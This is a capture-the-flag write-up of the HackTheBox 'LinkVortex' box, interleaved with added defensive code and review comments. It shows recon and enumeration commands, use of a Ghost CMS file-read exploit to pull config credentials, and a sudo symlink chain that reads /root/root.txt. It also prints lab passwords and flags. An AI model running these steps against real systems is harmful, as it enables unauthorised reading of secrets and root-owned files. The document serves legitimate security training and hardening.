LinkVortex

Tags: HackTheBox, Easy, Ghost CMS, Privilege Escalation, Web Security

A Ghost CMS instance with security misconfigurations leading to unauthorised access and privilege escalation. This write-up covers web application security testing and Linux privilege escalation techniques.

Overview

  • Category: Miscellaneous
  • Difficulty: Easy
  • Platform: HackTheBox
  • Release Date: 2023
  • Target IP: 10.10.11.47

Reconnaissance

Port Scanning

Nmap Scan
# Full TCP port scan
nmap -sC -sV -T4 -p- 10.10.11.47
Port     State   Service   Version
22/tcp   Open    SSH       OpenSSH 8.9p1 Ubuntu 3ubuntu0.10
80/tcp   Open    HTTP      Apache httpd

Additional Details

  • HTTP server redirects to http://linkvortex.htb/
  • SSH host keys:
    • ECDSA: 256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb
    • ED25519: 256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13

Web Enumeration

Directory Enumeration (Main Domain)

Gobuster Directory Scan
gobuster dir -u http://linkvortex.htb -w /usr/share/seclists/Discovery/Web-Content/common.txt

Subdomain Enumeration

FFUF Subdomain Scan
ffuf -u http://linkvortex.htb/ -w /usr/share/wordlists/Custom/DNS/n0kovo_subdomains_huge.txt \
     -H "Host: FUZZ.linkvortex.htb" -mc 200 -fs 178 -o dnsresults -of md -v

Discovered Subdomains

Subdomain   Status   Content Length   Type
dev         200      2538             text/html

Git Repository Enumeration

Found an exposed Git repository at dev.linkvortex.htb/.git/

Path           Status   Size
/.git/         301      239
/.git/HEAD     200      41
/.git/config   200      201
/.git/logs/    200      868
/.git/index    200      707577
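A self-check for this kind of exposure, added here and not part of the original write-up: given the status and body a server returns for /.git/HEAD, it separates a real repository leak from a host that answers 200 to every path (a "soft 404"), which would otherwise look identical in a status-only table like the one above. The hostnames and responses in SAMPLES are constructed; the two HEAD formats it matches are the ones git itself writes.

```python
"""Classify a /.git/HEAD response so soft-404 pages are not reported as leaks.

Added example, not from the write-up. git writes HEAD either as
"ref: refs/heads/<branch>" or, when detached (as the recovered repo was), as a
bare 40-hex commit id; anything else with a 200 is a catch-all page.
"""
import re

REF_LINE = re.compile(r"^ref: refs/[\w./-]+\s*$")
DETACHED_HEAD = re.compile(r"^[0-9a-f]{40}\s*$")


def classify_git_head(status: int, body: str) -> str:
    """Return 'exposed', 'blocked', 'absent', 'soft-404' or 'unexpected'."""
    if status in (401, 403):
        return "blocked"
    if status == 404:
        return "absent"
    if status != 200:
        return "unexpected"
    first_line = body.splitlines()[0] if body.strip() else ""
    if REF_LINE.match(first_line) or DETACHED_HEAD.match(first_line):
        return "exposed"
    return "soft-404"


# Constructed sample responses, as (status, body) for GET /.git/HEAD.
SAMPLES = {
    "dev host with .git served": (200, "ref: refs/heads/main\n"),
    "catch-all host": (200, "<html><body>Not found</body></html>"),
    "hardened host": (403, "Forbidden"),
    "detached HEAD": (200, "f4b7c0a6d1e3a9c2b8f5d4e7a1c3b2d9e8f7a6b5\n"),
}


def audit(samples=SAMPLES) -> dict:
    """Map each sample host to its verdict."""
    return {host: classify_git_head(s, b) for host, (s, b) in samples.items()}


if __name__ == "__main__":
    for host, verdict in audit().items():
        print(f"{host}: {verdict}")
```

On Apache, which is what the port scan found here, the whole directory can be refused with a `<DirectoryMatch "/\.git">` block containing `Require all denied`; the check above then reports "blocked" instead of "exposed".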

Source Code Analysis

Git Repository Investigation

Git Status
git status

# Output:
Not currently on any branch.
Changes to be committed:
  (use "git restore --staged <file>..." to unstage)
        new file:   Dockerfile.ghost
        modified:   ghost/core/test/regression/api/admin/authentication.test.js

Analyzing the changes revealed:

Dockerfile Changes
diff --git a/Dockerfile.ghost b/Dockerfile.ghost
new file mode 100644
index 0000000..50864e0
--- /dev/null
+++ b/Dockerfile.ghost
@@ -0,0 +1,16 @@
+FROM ghost:5.58.0
+
+# Copy the config
+COPY config.production.json /var/lib/ghost/config.production.json
+
+# Prevent installing packages
+RUN rm -rf /var/lib/apt/lists/* /etc/apt/sources.list* /usr/bin/apt-get /usr/bin/apt /usr/bin/dpkg /usr/sbin/dpkg /usr/bin/dpkg-deb /usr/sbin/dpkg-deb
+
+# Wait for the db to be ready first
+COPY wait-for-it.sh /var/lib/ghost/wait-for-it.sh
+COPY entry.sh /entry.sh
+RUN chmod +x /var/lib/ghost/wait-for-it.sh
+RUN chmod +x /entry.sh
+
+ENTRYPOINT ["/entry.sh"]
+CMD ["node", "current/index.js"]
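Review bot: `COPY config.production.json /var/lib/ghost/config.production.json` bakes the production config, including the SMTP credentials recovered later in this write-up, into an image layer, so anyone who can pull the image or read the build context gets them; mount the file at runtime or supply the secrets through environment variables instead. `FROM ghost:5.58.0` also pins the exact release the write-up identifies as affected by CVE-2023-40028, so the tag should be bumped to a fixed version rather than left as-is.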

Authentication Test Changes
diff --git a/ghost/core/test/regression/api/admin/authentication.test.js b/ghost/core/test/regression/api/admin/authentication.test.js
index 2735588..e654b0e 100644
--- a/ghost/core/test/regression/api/admin/authentication.test.js
+++ b/ghost/core/test/regression/api/admin/authentication.test.js
@@ -53,7 +53,7 @@ describe('Authentication API', function () {
 
         it('complete setup', async function () {
             const email = 'test@example.com';
-            const password = 'thisissupersafe';
+            const password = 'OctopiFociPilfer45';
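Review bot: the `+` line swaps an obviously fake test password for one that looks real; a credential committed into a test fixture stays recoverable from history even if it is edited out later, and with `.git` served from dev.linkvortex.htb this diff is readable by anyone. Keep fixtures on placeholder values, and if this value is in use on any account, rotate it.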

Initial Access

Ghost CMS Exploitation

  • Vulnerability: CVE-2023-40028 (Ghost CMS v5.58): authenticated users could upload files that are symlinks, which Ghost then served, giving an arbitrary file read on the host
  • Exploit Tool:
    Exploit Command
    ./cve-2023-40028 -u <username> -p <password> -h <host>

Configuration File Extraction

Retrieved /var/lib/ghost/config.production.json:

Ghost Configuration
{
  "url": "http://localhost:2368",
  "server": {
    "port": 2368,
    "host": "::"
  },
  "mail": {
    "transport": "SMTP",
    "options": {
      "service": "Google",
      "host": "linkvortex.htb",
      "port": 587,
      "auth": {
        "user": "bob@linkvortex.htb",
        "pass": "fibber-talented-worth"
      }
    }
  },
  "spam": {
    "user_login": {
      "minWait": 1,
      "maxWait": 604800000,
      "freeRetries": 5000
    }
  }
}
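An added example, not from the write-up or from Ghost, that parses a config like the one above and reports what makes it dangerous: the SMTP password stored in plaintext (which any file-read bug then hands over), and spam.user_login values that effectively switch off the login rate limiter (5000 free retries with a 1 ms minimum wait). The thresholds MAX_FREE_RETRIES and MIN_WAIT_MS are assumptions chosen for this check; compare them with the defaults.json shipped in your Ghost version. SAMPLE_CONFIG is the recovered file with the real password replaced by a placeholder.

```python
"""Audit a Ghost config.production.json for the weaknesses seen above.

Added example; not part of the write-up or of Ghost itself. The two
thresholds are assumptions for this check, not Ghost-defined limits.
"""
import json

MAX_FREE_RETRIES = 10     # assumed: more free attempts than this is no limiter at all
MIN_WAIT_MS = 60_000      # assumed: smallest acceptable back-off, one minute

# The recovered config with the real password swapped for a placeholder.
SAMPLE_CONFIG = """
{
  "url": "http://localhost:2368",
  "server": {"port": 2368, "host": "::"},
  "mail": {
    "transport": "SMTP",
    "options": {
      "service": "Google",
      "host": "linkvortex.htb",
      "port": 587,
      "auth": {"user": "bob@linkvortex.htb", "pass": "<REDACTED>"}
    }
  },
  "spam": {
    "user_login": {"minWait": 1, "maxWait": 604800000, "freeRetries": 5000}
  }
}
"""


def audit_ghost_config(cfg: dict) -> list:
    """Return human-readable findings for the settings this check understands."""
    findings = []
    login = cfg.get("spam", {}).get("user_login", {})
    retries = login.get("freeRetries")
    if retries is not None and retries > MAX_FREE_RETRIES:
        findings.append(f"spam.user_login.freeRetries={retries}: "
                        "login brute-force limiter is effectively disabled")
    wait = login.get("minWait")
    if wait is not None and wait < MIN_WAIT_MS:
        findings.append(f"spam.user_login.minWait={wait}ms: "
                        "no meaningful back-off between failed logins")
    auth = cfg.get("mail", {}).get("options", {}).get("auth", {})
    if auth.get("pass"):
        user = auth.get("user", "?")
        findings.append(f"mail.options.auth.pass: plaintext SMTP secret for {user} "
                        "sits in the config file, so any file-read bug leaks it")
    return findings


def audit_text(text: str) -> list:
    """Parse a config file body and audit it."""
    return audit_ghost_config(json.loads(text))


if __name__ == "__main__":
    for finding in audit_text(SAMPLE_CONFIG):
        print("-", finding)
```

The same SMTP password turned out to be bob's SSH password, which is the reuse that the final finding is warning about: a secret in a world-readable config file should be scoped to the one service that needs it.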

SSH Access

  • Successfully authenticated as user bob using discovered credentials
  • User flag obtained

Privilege Escalation

Sudo Permissions Analysis

Sudo Permissions
sudo -l

# Output:
User bob may run the following commands on linkvortex:
    (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png

Root Flag Extraction

Symlink Attack
# Create symlinks
ln -s /root/root.txt /home/bob/test.txt
ln -s /home/bob/test.txt /home/bob/test.png

# Execute exploit
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/test.png
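A hardened cleaner, added here as an example; it is not the box's /opt/ghost/clean_symlink.sh (the write-up does not show that script) and it assumes the cleaner's job is to find .png files that are symlinks and stop them reaching outside an allowed uploads directory. The two-hop layout above works because a check that only inspects a link's immediate target never sees where the chain ends. The defensive fixes shown: resolve the whole chain with os.path.realpath before judging the target, compare canonical paths instead of substrings, and never read through the link, whatever a CHECK_CONTENT-style switch says. The files and link chain built by demo() are constructed in a scratch directory.

```python
"""Hardened symlink cleaner (added example, not the box's clean_symlink.sh).

Assumption: .png symlinks under an uploads directory are allowed only if their
fully resolved target stays inside that directory; anything else is moved to
quarantine without ever being read.
"""
import os
import shutil
import tempfile


def resolved_target_allowed(link: str, allowed_root: str) -> bool:
    """True only if the fully resolved target of `link` stays under allowed_root."""
    final = os.path.realpath(link)        # follows every hop, not just the first
    root = os.path.realpath(allowed_root)
    return os.path.commonpath([final, root]) == root


def clean_symlink(path: str, allowed_root: str, quarantine: str) -> str:
    """Return 'ignored', 'kept' or 'quarantined'. The link is moved, never read."""
    if not path.endswith(".png") or not os.path.islink(path):
        return "ignored"
    if resolved_target_allowed(path, allowed_root):
        return "kept"
    os.makedirs(quarantine, exist_ok=True)
    # shutil.move on a symlink relocates the link itself, not its target.
    shutil.move(path, os.path.join(quarantine, os.path.basename(path)))
    return "quarantined"


def demo(base=None) -> dict:
    """Recreate the two-hop layout from the write-up (constructed, in a scratch
    directory) and run the cleaner over it."""
    base = base or tempfile.mkdtemp(prefix="symlink-demo-")
    uploads = os.path.join(base, "uploads")
    secret = os.path.join(base, "secret", "root.txt")   # stands in for /root/root.txt
    os.makedirs(uploads, exist_ok=True)
    os.makedirs(os.path.dirname(secret), exist_ok=True)
    with open(secret, "w") as fh:
        fh.write("constructed secret\n")
    inner = os.path.join(uploads, "test.txt")
    outer = os.path.join(uploads, "test.png")
    os.symlink(secret, inner)   # first hop leaves the uploads directory
    os.symlink(inner, outer)    # the .png link only points at the inner link
    legit = os.path.join(uploads, "image.png")
    open(legit, "w").close()
    ok_link = os.path.join(uploads, "ok.png")
    os.symlink(legit, ok_link)  # a link that stays inside uploads
    quarantine = os.path.join(base, "quarantine")
    return {
        "test.png": clean_symlink(outer, uploads, quarantine),
        "ok.png": clean_symlink(ok_link, uploads, quarantine),
        "image.png": clean_symlink(legit, uploads, quarantine),
    }


if __name__ == "__main__":
    print(demo())  # {'test.png': 'quarantined', 'ok.png': 'kept', 'image.png': 'ignored'}
```

The sudo rule itself is the other half of the fix: `NOPASSWD` on a script that accepts an attacker-chosen path and honours environment variables such as CHECK_CONTENT gives the caller control over what runs as root, so the rule should pass a fixed argument list and sudo should not forward arbitrary variables into it.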

Flags

User Flag

e9e77193e25870661af3813cab24a91c

Root Flag

cdf8ecab5aace4312e2b04673c4fe73d

Key Takeaways

  1. Always check for exposed Git repositories and analyse their contents
  2. Version-specific vulnerabilities in CMS systems can be critical (Ghost CMS 5.58)
  3. Configuration files often contain valuable credentials
  4. Symlink attacks can be effective for privilege escalation when combined with sudo permissions

Tools Used

  • nmap
  • gobuster
  • ffuf
  • git
  • CVE-2023-40028 exploit
  • Basic Linux commands (ln, sudo)
